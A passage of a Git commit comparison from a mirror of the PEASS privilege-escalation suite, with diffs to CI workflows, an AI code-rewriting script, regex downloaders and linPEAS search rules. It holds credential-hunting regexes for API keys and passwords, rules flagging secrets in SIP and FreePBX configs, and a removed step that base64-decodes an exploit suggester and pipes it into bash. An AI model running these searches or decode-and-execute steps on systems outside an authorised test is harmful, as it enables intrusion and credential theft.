mirror of
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
synced 2025-12-08 01:51:28 +00:00
Compare commits
75 Commits
carlospolo
...
aicoder
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
78ad8346a3 | ||
|
|
a0f612b582 | ||
|
|
aa59afe289 | ||
|
|
08144aaac3 | ||
|
|
8f533247be | ||
|
|
660dc3dc60 | ||
|
|
7b8b6670b8 | ||
|
|
6f48de1573 | ||
|
|
3cceae682d | ||
|
|
4a29293199 | ||
|
|
6d2e33cd61 | ||
|
|
8dd0350b5c | ||
|
|
b4801ccc4d | ||
|
|
083ed6ae7d | ||
|
|
ad2150ded5 | ||
|
|
74377ec9e8 | ||
|
|
917a3a0101 | ||
|
|
099755dbcb | ||
|
|
b9a44ffe66 | ||
|
|
cdd342fb26 | ||
|
|
36523f520f | ||
|
|
7f4965c0b7 | ||
|
|
898b29b0fa | ||
|
|
e36d5a5736 | ||
|
|
11cfe79ad0 | ||
|
|
a1552d61df | ||
|
|
71ec9c7d31 | ||
|
|
d4ff43b604 | ||
|
|
56a193df60 | ||
|
|
f67bedda4f | ||
|
|
f988d8b05f | ||
|
|
78c932f1af | ||
|
|
7e7738ab98 | ||
|
|
68cd1c28df | ||
|
|
58719a6075 | ||
|
|
2a4868c0eb | ||
|
|
e4b9ae6479 | ||
|
|
7b096cd930 | ||
|
|
a9ae25cdc3 | ||
|
|
e7617700b3 | ||
|
|
96c821193e | ||
|
|
7bb66d2182 | ||
|
|
711d9f1a95 | ||
|
|
a36c2c9107 | ||
|
|
2963e47866 | ||
|
|
d20699ed51 | ||
|
|
df4f122a53 | ||
|
|
7f8ea5fa44 | ||
|
|
7e9c9b4e5b | ||
|
|
fad2771dfb | ||
|
|
3e213bd8fd | ||
|
|
5356d3f2ec | ||
|
|
2ac2debc59 | ||
|
|
bb47a172b3 | ||
|
|
69c3906ab7 | ||
|
|
3bec4c4b52 | ||
|
|
345bf63b40 | ||
|
|
1e796b9876 | ||
|
|
39d811c16f | ||
|
|
a0175b0172 | ||
|
|
b0f4868feb | ||
|
|
4f295a138d | ||
|
|
a1e06de8ca | ||
|
|
2775083680 | ||
|
|
62e4b071cd | ||
|
|
4a0b8fb065 | ||
|
|
4ba0f6b6c2 | ||
|
|
ff96d02125 | ||
|
|
4f3a8265e0 | ||
|
|
8912bd2b9c | ||
|
|
438e00527d | ||
|
|
144c0aef6f | ||
|
|
c597da42f7 | ||
|
|
613bf14049 | ||
|
|
5b96594c3c |
1
.github/ISSUE_TEMPLATE.md
vendored
1
.github/ISSUE_TEMPLATE.md
vendored
@@ -1,4 +1,5 @@
|
||||
If you are going to suggest something, please remove the following template.
|
||||
If your issue is related with WinPEAS.ps1 please mention https://github.com/RandolphConley
|
||||
|
||||
#### Issue description
|
||||
|
||||
|
||||
28
.github/workflows/CI-master_tests.yml
vendored
28
.github/workflows/CI-master_tests.yml
vendored
@@ -1,9 +1,11 @@
|
||||
name: CI-master_test
|
||||
|
||||
on:
|
||||
pull_request:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- '.github/**'
|
||||
|
||||
schedule:
|
||||
- cron: "5 4 * * SUN"
|
||||
@@ -27,6 +29,10 @@ jobs:
|
||||
with:
|
||||
ref: ${{ github.head_ref }}
|
||||
|
||||
- name: Download regexes
|
||||
run: |
|
||||
powershell.exe -ExecutionPolicy Bypass -File build_lists/download_regexes.ps1
|
||||
|
||||
# Add MSBuild to the PATH: https://github.com/microsoft/setup-msbuild
|
||||
- name: Setup MSBuild.exe
|
||||
uses: microsoft/setup-msbuild@v1.0.2
|
||||
@@ -43,9 +49,9 @@ jobs:
|
||||
- name: run MSBuild
|
||||
run: msbuild $env:Solution_Path
|
||||
|
||||
# Execute all unit tests in the solution
|
||||
- name: Execute unit tests
|
||||
run: dotnet test $env:Solution_Path
|
||||
# Execute all unit tests in the solution - It's broken :(
|
||||
#- name: Execute unit tests
|
||||
# run: dotnet test $env:Solution_Path
|
||||
|
||||
# Build & update all versions
|
||||
- name: Build all versions
|
||||
@@ -134,6 +140,12 @@ jobs:
|
||||
name: winPEAS.bat
|
||||
path: winPEAS\winPEASbat\winPEAS.bat
|
||||
|
||||
- name: Upload winpeas.ps1
|
||||
uses: actions/upload-artifact@v2
|
||||
with:
|
||||
name: winPEAS.ps1
|
||||
path: winPEAS\winPEASps1\winPEAS.ps1
|
||||
|
||||
# Git add
|
||||
#- name: Create local changes
|
||||
# run: |
|
||||
@@ -408,6 +420,10 @@ jobs:
|
||||
id: date
|
||||
run: echo "::set-output name=date::$(date +'%Y%m%d')"
|
||||
|
||||
- name: Generate random
|
||||
id: random_n
|
||||
run: echo "::set-output name=some_rand::$(openssl rand -hex 4)"
|
||||
|
||||
# Create the release
|
||||
- name: Create Release
|
||||
id: create_release
|
||||
@@ -415,8 +431,8 @@ jobs:
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
tag_name: ${{steps.date.outputs.date}}
|
||||
release_name: Release ${{ github.ref }}2 ${{steps.date.outputs.date}}
|
||||
tag_name: ${{steps.date.outputs.date}}-${{steps.random_n.outputs.some_rand}}
|
||||
release_name: Release ${{ github.ref }} ${{steps.date.outputs.date}}-${{steps.random_n.outputs.some_rand}}
|
||||
draft: false
|
||||
prerelease: false
|
||||
|
||||
|
||||
23
.github/workflows/aicoder.yml
vendored
Normal file
23
.github/workflows/aicoder.yml
vendored
Normal file
@@ -0,0 +1,23 @@
|
||||
name: aicoder
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
Build_and_test_winpeas_master:
|
||||
runs-on: ubuntu-latest
|
||||
|
||||
steps:
|
||||
# checkout
|
||||
- name: AICoder GH Action
|
||||
uses: AICoderHub/GH_Action@v0.11
|
||||
with:
|
||||
INPUT_MODE: 'file-optimizer'
|
||||
INPUT_PROMPT: ''
|
||||
INPUT_OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
|
||||
INPUT_MODEL: 'gpt-4'
|
||||
TEMPLATE_FILES: ''
|
||||
ORIGIN_BRANCH: 'aicoder'
|
||||
TO_BRANCH: 'master'
|
||||
CHECK_PATH: './parsers/json2pdf.py'
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
2
.gitignore
vendored
2
.gitignore
vendored
@@ -28,3 +28,5 @@ sh2bin
|
||||
sh2bin/*
|
||||
.dccache
|
||||
./*/.dccache
|
||||
regexes.yaml
|
||||
build_lists/regexes.yaml
|
||||
208
AICoder.py
Normal file
208
AICoder.py
Normal file
@@ -0,0 +1,208 @@
|
||||
import argparse
|
||||
import os
|
||||
import sys
|
||||
import string
|
||||
import random
|
||||
from typing import List
|
||||
import openai
|
||||
import json
|
||||
import subprocess
|
||||
import tiktoken
|
||||
import requests
|
||||
from github import Github
|
||||
|
||||
#########################
|
||||
#### OPENAI FUNCTIONS ###
|
||||
#########################
|
||||
|
||||
def reportTokens(prompt, model="gpt-4"):
|
||||
encoding = tiktoken.encoding_for_model(model)
|
||||
print("\033[37m" + str(len(encoding.encode(prompt))) + " tokens\033[0m" + " in prompt: " + "\033[92m" + prompt[:50] + "\033[0m" + ("..." if len(prompt) > 50 else ""))
|
||||
|
||||
def write_file(file_path: str, content: str):
|
||||
"""Write content to a file creating the needed directories first"""
|
||||
os.makedirs(os.path.dirname(file_path), exist_ok=True)
|
||||
|
||||
with open(file_path, "w") as file:
|
||||
file.write(content)
|
||||
|
||||
def delete_file(file_path: str):
|
||||
"""Delete a file if it exists"""
|
||||
|
||||
if os.path.isfile(file_path):
|
||||
os.remove(file_path)
|
||||
|
||||
openai_available_functions = {
|
||||
"write_file": write_file, "delete_file": delete_file
|
||||
}
|
||||
|
||||
openai_functions = [
|
||||
{
|
||||
"name": "write_file",
|
||||
"description": "Write a file giving the path and the content",
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"file_path": {
|
||||
"type": "string",
|
||||
"description": "Path to the file to write",
|
||||
},
|
||||
"content": {
|
||||
"type": "string",
|
||||
"description": "Content to write in the file",
|
||||
},
|
||||
},
|
||||
"required": ["file_path", "content"],
|
||||
},
|
||||
},
|
||||
{
|
||||
"name": "delete_file",
|
||||
"description": "Delete a file",
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"file_path": {
|
||||
"type": "string",
|
||||
"description": "Path to the file to write",
|
||||
}
|
||||
},
|
||||
"required": ["file_path"],
|
||||
},
|
||||
}
|
||||
]
|
||||
|
||||
|
||||
#########################
|
||||
#### GIT FUNCTIONS ######
|
||||
#########################
|
||||
|
||||
|
||||
def create_pull_request(branch_name, commit_message, github_token):
|
||||
github = Github(github_token)
|
||||
repo = github.get_repo(os.environ["GITHUB_REPOSITORY"])
|
||||
|
||||
# Create a new branch
|
||||
base_branch = repo.get_branch(repo.default_branch)
|
||||
repo.create_git_ref(ref=f"refs/heads/{branch_name}", sha=base_branch.commit.sha)
|
||||
|
||||
# Commit changes to the new branch
|
||||
subprocess.run(["git", "checkout", branch_name])
|
||||
subprocess.run(["git", "add", "."])
|
||||
subprocess.run(["git", "commit", "-m", commit_message])
|
||||
subprocess.run(["git", "push", "origin", branch_name])
|
||||
|
||||
# Create a pull request
|
||||
pr = repo.create_pull(
|
||||
title=commit_message,
|
||||
body="Generated by OpenAI Github Action",
|
||||
head=branch_name,
|
||||
base=repo.default_branch
|
||||
)
|
||||
|
||||
return pr.html_url
|
||||
|
||||
|
||||
#########################
|
||||
#### FILE PROCESSING ####
|
||||
#########################
|
||||
|
||||
|
||||
def process_file(prompt: str, api_key: str, file_path: str, model: str="gpt-4") -> str:
|
||||
with open(file_path, "r") as file:
|
||||
file_content = file.read()
|
||||
|
||||
messages = [
|
||||
{"role": "system", "content": f"You are a developer and your goal is to generate code. The user will ask you to improve and modify some code. Your response must be a valid JSON with the path of each file to write as keys and the content of the files as values. Several files can be written at the same time."},
|
||||
{"role": "user", "content": prompt},
|
||||
{"role": "user", "content": f"This is the code from the file '{file_path}':\n\n{file_content}"}
|
||||
]
|
||||
openai.api_key = api_key
|
||||
|
||||
reportTokens(f"This is the code from the file '{file_path}':\n\n{file_content}")
|
||||
|
||||
response = openai.ChatCompletion.create(
|
||||
model=model,
|
||||
messages=messages,
|
||||
temperature=0
|
||||
)
|
||||
response_message = response["choices"][0]["message"]
|
||||
|
||||
# Step 2: check if GPT wanted to call a function
|
||||
if response_message.get("function_call"):
|
||||
|
||||
function_name = response_message["function_call"]["name"]
|
||||
fuction_to_call = openai_available_functions[function_name]
|
||||
function_args = json.loads(response_message["function_call"]["arguments"])
|
||||
fuction_to_call(**function_args)
|
||||
|
||||
|
||||
def process_folder(prompt: str, api_key: str, folder_path: str, model: str="gpt-4") -> List[str]:
|
||||
responses = []
|
||||
for root, _, files in os.walk(folder_path):
|
||||
for file in files:
|
||||
file_path = os.path.join(root, file)
|
||||
response = process_file(prompt, api_key, file_path, model)
|
||||
responses.append(response)
|
||||
|
||||
|
||||
#########################
|
||||
#### MAIN FUNCTION ######
|
||||
#########################
|
||||
|
||||
|
||||
def get_random_string(length):
|
||||
# With combination of lower and upper case
|
||||
letters = string.ascii_letters
|
||||
result_str = ''.join(random.choice(letters) for i in range(length))
|
||||
return result_str
|
||||
|
||||
def main(prompt: str, api_key: str, file_path: str, github_token: str, model: str="gpt-4"):
|
||||
if os.path.isfile(file_path):
|
||||
process_file(prompt, api_key, file_path, model)
|
||||
elif os.path.isdir(file_path):
|
||||
process_folder(prompt, api_key, file_path, model)
|
||||
else:
|
||||
print("Error: Invalid file path.")
|
||||
sys.exit(1)
|
||||
|
||||
try:
|
||||
create_pull_request(get_random_string(5), f"Modified {file_path}", github_token)
|
||||
except Exception as e:
|
||||
print(f"Error: Failed to create pull request. {e}")
|
||||
sys.exit(1)
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Setup the argument parser
|
||||
parser = argparse.ArgumentParser()
|
||||
|
||||
# Add arguments for prompt, api_key, file_path and github_token
|
||||
parser.add_argument('--prompt', default=None, type=str, help='Input prompt')
|
||||
parser.add_argument('--api-key', default=None, type=str, help='Input API key')
|
||||
parser.add_argument('--path', default=None, type=str, help='Input file/folder path')
|
||||
parser.add_argument('--github-token', default=None, type=str, help='Github token')
|
||||
parser.add_argument('--model', default="gpt-4", type=str, help='Model to use')
|
||||
|
||||
# Parse the arguments
|
||||
args = parser.parse_args()
|
||||
prompt = os.environ.get("INPUT_PROMPT", args.prompt)
|
||||
api_key = os.environ.get("INPUT_API_KEY", args.api_key)
|
||||
file_path = os.environ.get("INPUT_FILE_PATH", args.path)
|
||||
github_token = os.environ.get("GITHUB_TOKEN", args.github_token)
|
||||
model = os.environ.get("INPUT_MODEL", args.model)
|
||||
|
||||
if not prompt or not api_key or not file_path:
|
||||
print("Error: Missing required inputs.")
|
||||
sys.exit(1)
|
||||
|
||||
#if not github_token:
|
||||
# print("Error: Missing github token.")
|
||||
# sys.exit(1)
|
||||
|
||||
if os.path.exists(prompt):
|
||||
with open(prompt, "r") as file:
|
||||
prompt = file.read()
|
||||
|
||||
if prompt.startswith("http"):
|
||||
prompt = requests.get(prompt).text
|
||||
|
||||
main(prompt, api_key, file_path, github_token, model)
|
||||
@@ -30,7 +30,7 @@ Do you want to have **access the latest version of Hacktricks and PEASS**, obtai
|
||||
|
||||
**LinPEAS, WinPEAS and MacPEAS** aren’t enough for you? Welcome [**The PEASS Family**](https://opensea.io/collection/the-peass-family/), a limited collection of [**exclusive NFTs**](https://opensea.io/collection/the-peass-family/) of our favourite PEASS in disguise, designed by my team. Go **get your favourite and make it yours!** And if you are a **PEASS & Hacktricks enthusiast**, you can get your hands now on **our [custom swag](https://peass.creator-spring.com/) and show how much you like our projects!**
|
||||
|
||||
You can also, join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts, or follow me on Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).
|
||||
You can also, join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts, or follow me on Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).
|
||||
|
||||
## Let's improve PEASS together
|
||||
|
||||
|
||||
5
build_lists/download_regexes.ps1
Normal file
5
build_lists/download_regexes.ps1
Normal file
@@ -0,0 +1,5 @@
|
||||
$scriptDir = Split-Path -Parent $MyInvocation.MyCommand.Path
|
||||
$filePath = Join-Path $scriptDir "regexes.yaml"
|
||||
$url = "https://raw.githubusercontent.com/JaimePolop/RExpository/main/regex.yaml"
|
||||
|
||||
Invoke-WebRequest $url -OutFile $filePath
|
||||
24
build_lists/download_regexes.py
Executable file
24
build_lists/download_regexes.py
Executable file
@@ -0,0 +1,24 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import os
|
||||
import requests
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
def download_regexes():
|
||||
print("[+] Downloading regexes...")
|
||||
url = "https://raw.githubusercontent.com/JaimePolop/RExpository/main/regex.yaml"
|
||||
response = requests.get(url)
|
||||
if response.status_code == 200:
|
||||
# Save the content of the response to a file
|
||||
script_folder = Path(os.path.dirname(os.path.abspath(__file__)))
|
||||
target_file = script_folder / 'regexes.yaml'
|
||||
|
||||
with open(target_file, "w") as file:
|
||||
file.write(response.text)
|
||||
print(f"Downloaded and saved in '{target_file}' successfully!")
|
||||
else:
|
||||
print("Error: Unable to download the regexes file.")
|
||||
exit(1)
|
||||
|
||||
download_regexes()
|
||||
@@ -1,204 +1,2 @@
|
||||
paths:
|
||||
- $HOMESEARCH
|
||||
- /etc
|
||||
- /opt
|
||||
- /tmp
|
||||
- /private
|
||||
- /Applications
|
||||
- /var/www
|
||||
- /var/log
|
||||
- /private/var/log
|
||||
- /usr/local/www/
|
||||
- $backup_folders_row
|
||||
|
||||
|
||||
regular_expresions:
|
||||
# Hashes passwords
|
||||
- name: Hashed Passwords
|
||||
regexes:
|
||||
- name: Apr1 MD5
|
||||
regex: '\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
|
||||
|
||||
- name: Apache SHA
|
||||
regex: '\{SHA\}[0-9a-zA-Z/_=]{10,}'
|
||||
|
||||
- name: Blowfish
|
||||
regex: '\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*'
|
||||
|
||||
- name: Drupal
|
||||
regex: '\$S\$[a-zA-Z0-9_/\.]{52}'
|
||||
|
||||
- name: Joomlavbulletin
|
||||
regex: '[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}'
|
||||
|
||||
- name: Linux MD5
|
||||
regex: '\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
|
||||
|
||||
- name: phpbb3
|
||||
regex: '\$H\$[a-zA-Z0-9_/\.]{31}'
|
||||
|
||||
- name: sha512crypt
|
||||
regex: '\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}'
|
||||
|
||||
- name: Wordpress
|
||||
regex: '\$P\$[a-zA-Z0-9_/\.]{31}'
|
||||
|
||||
|
||||
# Raw Hashes
|
||||
- name: Raw Hashes
|
||||
regexes:
|
||||
#- name: md5 #Too many false positives
|
||||
# regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)'
|
||||
|
||||
#- name: sha1 #Too many false positives
|
||||
# regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)'
|
||||
|
||||
#- name: sha256 #Too many false positives
|
||||
# regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)'
|
||||
|
||||
- name: sha512
|
||||
regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)'
|
||||
|
||||
# APIs
|
||||
# https://github.com/l4yton/RegHex/blob/master/README.md
|
||||
- name: APIs
|
||||
regexes:
|
||||
#- name: Artifactory API Token # False +
|
||||
# regex: 'AKC[a-zA-Z0-9]{10,}' # False +
|
||||
|
||||
#- name: Artifactory Password
|
||||
# regex: 'AP[\dABCDEF][a-zA-Z0-9]{8,}'
|
||||
|
||||
#- name: Authorization Basic # Too many false positives
|
||||
# regex: 'basic [a-zA-Z0-9_:\.=\-]+'
|
||||
|
||||
#- name: Authorization Bearer # Too many false positives
|
||||
# regex: 'bearer [a-zA-Z0-9_\.=\-]+'
|
||||
|
||||
- name: AWS Client ID
|
||||
regex: '(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'
|
||||
extra_grep: '-Ev ":#|:<\!\-\-"'
|
||||
|
||||
- name: AWS MWS Key
|
||||
regex: 'amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
|
||||
|
||||
- name: AWS Secret Key
|
||||
regex: aws(.{0,20})?['"][0-9a-zA-Z\/+]{40}['"]
|
||||
|
||||
#- name: Base32 #Too many false positives
|
||||
# regex: '(?:[A-Z2-7]{8})*(?:[A-Z2-7]{2}={6}|[A-Z2-7]{4}={4}|[A-Z2-7]{5}={3}|[A-Z2-7]{7}=)?'
|
||||
|
||||
#- name: Base64 #Too many false positives
|
||||
# regex: '(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[a-zA-Z0-9+/]+={0,2}'
|
||||
|
||||
- name: Basic Auth Credentials
|
||||
regex: '://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+'
|
||||
|
||||
- name: Cloudinary Basic Auth
|
||||
regex: 'cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+'
|
||||
|
||||
- name: Facebook Access Token
|
||||
regex: 'EAACEdEose0cBA[0-9A-Za-z]+'
|
||||
|
||||
- name: Facebook Client ID
|
||||
regex: ([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['"][0-9]{13,17}
|
||||
|
||||
- name: Facebook Oauth
|
||||
regex: >
|
||||
[fF][aA][cC][eE][bB][oO][oO][kK].*['|"][0-9a-f]{32}['|"]
|
||||
|
||||
- name: Facebook Secret Key
|
||||
regex: >
|
||||
([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['"][0-9a-f]{32}
|
||||
|
||||
- name: Github
|
||||
regex: >
|
||||
github(.{0,20})?['"][0-9a-zA-Z]{35,40}
|
||||
|
||||
- name: Google API Key
|
||||
regex: 'AIza[0-9A-Za-z_\-]{35}'
|
||||
|
||||
- name: Google Cloud Platform API Key
|
||||
regex: >
|
||||
(google|gcp|youtube|drive|yt)(.{0,20})?['"][AIza[0-9a-z_\-]{35}]['"]
|
||||
|
||||
- name: Google Drive Oauth
|
||||
regex: '[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com'
|
||||
|
||||
- name: Google Oauth Access Token
|
||||
regex: 'ya29\.[0-9A-Za-z_\-]+'
|
||||
|
||||
- name: Heroku API Key
|
||||
regex: '[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'
|
||||
|
||||
- name: LinkedIn Client ID
|
||||
regex: >
|
||||
linkedin(.{0,20})?['"][0-9a-z]{12}['"]
|
||||
|
||||
- name: LinkedIn Secret Key
|
||||
regex: >
|
||||
linkedin(.{0,20})?['"][0-9a-z]{16}['"]
|
||||
|
||||
- name: Mailchamp API Key
|
||||
regex: '[0-9a-f]{32}-us[0-9]{1,2}'
|
||||
|
||||
- name: Mailgun API Key
|
||||
regex: 'key-[0-9a-zA-Z]{32}'
|
||||
|
||||
- name: Picatic API Key
|
||||
regex: 'sk_live_[0-9a-z]{32}'
|
||||
|
||||
- name: Slack Token
|
||||
regex: 'xox[baprs]-([0-9a-zA-Z]{10,48})?'
|
||||
|
||||
#- name: Slack Webhook #Not interesting
|
||||
# regex: 'https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}'
|
||||
|
||||
- name: Stripe API Key
|
||||
regex: 'k_live_[0-9a-zA-Z]{24}'
|
||||
|
||||
- name: Square Access Token
|
||||
regex: 'sqOatp-[0-9A-Za-z_\-]{22}'
|
||||
|
||||
- name: Square Oauth Secret
|
||||
regex: 'sq0csp-[ 0-9A-Za-z_\-]{43}'
|
||||
|
||||
- name: Twilio API Key
|
||||
regex: 'SK[0-9a-fA-F]{32}'
|
||||
|
||||
- name: Twitter Client ID
|
||||
regex: >
|
||||
[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['"][0-9a-z]{18,25}
|
||||
|
||||
- name: Twitter Oauth
|
||||
regex: >
|
||||
[tT][wW][iI][tT][tT][eE][rR].{0,30}['"\\s][0-9a-zA-Z]{35,44}['"\\s]
|
||||
|
||||
- name: Twitter Secret Key
|
||||
regex: >
|
||||
[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['"][0-9a-z]{35,44}
|
||||
|
||||
#- name: Vault Token #False +
|
||||
# regex: '[sb]\.[a-zA-Z0-9]{24}'
|
||||
|
||||
|
||||
# Misc
|
||||
- name: Misc
|
||||
regexes:
|
||||
- name: Basic Auth
|
||||
regex: '//(.+):(.+)@'
|
||||
|
||||
- name: Passwords1
|
||||
regex: (pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)
|
||||
|
||||
#- name: Passwords2
|
||||
# regex: 'passwd|creden|pwd'
|
||||
|
||||
- name: Usernames
|
||||
regex: 'username.*[=:].+'
|
||||
|
||||
#- name: IPs
|
||||
# regex: '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
|
||||
|
||||
#- name: Emails # Too many false positives
|
||||
# regex: '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}'
|
||||
This is a placeholder.
|
||||
To fill this yaml execute one of the scripts download_regexes.py or download_regexes.ps1
|
||||
@@ -1141,6 +1141,15 @@ search:
|
||||
- name: "authorized_keys"
|
||||
value:
|
||||
good_regex: 'from=[\w\._\-]+'
|
||||
bad_regex: "command=.*"
|
||||
type: f
|
||||
search_in:
|
||||
- common
|
||||
|
||||
- name: "*.pub"
|
||||
value:
|
||||
bad_regex: "command=.*"
|
||||
only_bad_lines: True
|
||||
type: f
|
||||
search_in:
|
||||
- common
|
||||
@@ -1376,6 +1385,12 @@ search:
|
||||
search_in:
|
||||
- common
|
||||
|
||||
- name: "ErrorRecords" #Azure logs can contain creentials
|
||||
value:
|
||||
type: d
|
||||
search_in:
|
||||
- common
|
||||
|
||||
- name: "TokenCache.dat"
|
||||
value:
|
||||
bad_regex: ".*"
|
||||
@@ -1691,6 +1706,43 @@ search:
|
||||
type: f
|
||||
search_in:
|
||||
- common
|
||||
- name: SIP
|
||||
value:
|
||||
config:
|
||||
auto_check: True
|
||||
|
||||
files:
|
||||
- name: "sip.conf"
|
||||
value:
|
||||
bad_regex: "secret.*|allowguest.*=.*true"
|
||||
remove_empty_lines: True
|
||||
type: f
|
||||
search_in:
|
||||
- common
|
||||
|
||||
- name: "amportal.conf"
|
||||
value:
|
||||
bad_regex: ".*PASS.*=.*"
|
||||
remove_empty_lines: True
|
||||
type: f
|
||||
search_in:
|
||||
- common
|
||||
|
||||
- name: "FreePBX.conf"
|
||||
value:
|
||||
bad_regex: ".*AMPDB.*=.*"
|
||||
only_bad_lines: True
|
||||
type: f
|
||||
search_in:
|
||||
- common
|
||||
|
||||
- name: "Elastix.conf"
|
||||
value:
|
||||
bad_regex: ".*pwd.*=.*"
|
||||
remove_empty_lines: True
|
||||
type: f
|
||||
search_in:
|
||||
- common
|
||||
|
||||
- name: GMV Auth
|
||||
value:
|
||||
|
||||
4622
linPEAS/builder/linpeas_base.sh
Normal file
4622
linPEAS/builder/linpeas_base.sh
Normal file
File diff suppressed because one or more lines are too long
@@ -37,6 +37,7 @@ search_for_regex(){
|
||||
timeout 120 find /tmp /srv /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
|
||||
fi
|
||||
wait
|
||||
printf "\033[2K\r"
|
||||
}
|
||||
|
||||
|
||||
|
||||
@@ -99,145 +99,3 @@ if [ "$(command -v smbutil)" ] || [ "$DEBUG" ]; then
|
||||
warn_exec smbutil statshares -a
|
||||
echo ""
|
||||
fi
|
||||
|
||||
#-- SY) Environment vars
|
||||
print_2title "Environment"
|
||||
print_info "Any private information inside environment variables?"
|
||||
(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_KUBERNETES" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set"
|
||||
echo ""
|
||||
|
||||
#-- SY) Dmesg
|
||||
if [ "$(command -v dmesg 2>/dev/null)" ] || [ "$DEBUG" ]; then
|
||||
print_2title "Searching Signature verification failed in dmesg"
|
||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed"
|
||||
(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
|
||||
echo ""
|
||||
fi
|
||||
|
||||
#-- SY) Kernel extensions
|
||||
if [ "$MACPEAS" ]; then
|
||||
print_2title "Kernel Extensions not belonging to apple"
|
||||
kextstat 2>/dev/null | grep -Ev " com.apple."
|
||||
|
||||
print_2title "Unsigned Kernel Extensions"
|
||||
macosNotSigned /Library/Extensions
|
||||
macosNotSigned /System/Library/Extensions
|
||||
fi
|
||||
|
||||
if [ "$(command -v bash 2>/dev/null)" ]; then
|
||||
print_2title "Executing Linux Exploit Suggester"
|
||||
print_info "https://github.com/mzet-/linux-exploit-suggester"
|
||||
les_b64="peass{LES}"
|
||||
echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,\[CVE-[0-9]+-[0-9]+\].*,${SED_RED},g"
|
||||
echo ""
|
||||
fi
|
||||
|
||||
if [ "$(command -v perl 2>/dev/null)" ]; then
|
||||
print_2title "Executing Linux Exploit Suggester 2"
|
||||
